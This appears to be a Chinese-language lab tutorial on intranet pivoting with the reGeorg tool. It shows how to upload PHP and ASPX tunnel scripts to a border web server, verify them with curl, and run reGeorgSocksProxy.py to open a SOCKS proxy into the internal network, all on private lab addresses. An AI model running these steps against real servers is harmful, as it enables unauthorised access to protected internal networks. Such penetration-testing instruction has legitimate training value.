kali(攻击机,外网地址:192.168.8.48)
Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10)
CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)
DC(内网地址:10.1.1.2)
下载地址:https://github.com/sensepost/reGeorg
此处只对php和aspx做演示,其他环境同理不做赘述。
3.1 PHP 3.1.1 边界服务器Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10)
将对应的脚本上传到服务器网站根目录:
kali(攻击机,外网地址:192.168.8.48)
访问脚本是否正常工作:
curl 192.168.8.57/tunnel.nosocket.php
若正常会返回:Georg says, ‘All seems fine’
建立隧道连接,并开放本地侦听端口(注意,要用python2):
如果目标网站是https更好,毕竟http没有加密。
python2 reGeorgSocksProxy.py -u http://192.168.8.57/tunnel.nosocket.php -p 8888
此时可以看到,8888端口已经开始侦听,此时使用此socks代理就可以成功访问到内网。
浏览器代理访问:
proxychains代理访问:
Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10)
同理,先上传aspx文件:
kali(攻击机,外网地址:192.168.8.48)
同理访问脚本是否正常工作:
curl 192.168.8.57/tunnel.aspx
若正常会返回:Georg says, ‘All seems fine’
建立隧道连接,并开放本地侦听端口(注意,要用python2):
python2 reGeorgSocksProxy.py -u http://192.168.8.57/tunnel.aspx -p 8888
同理,代理访问:
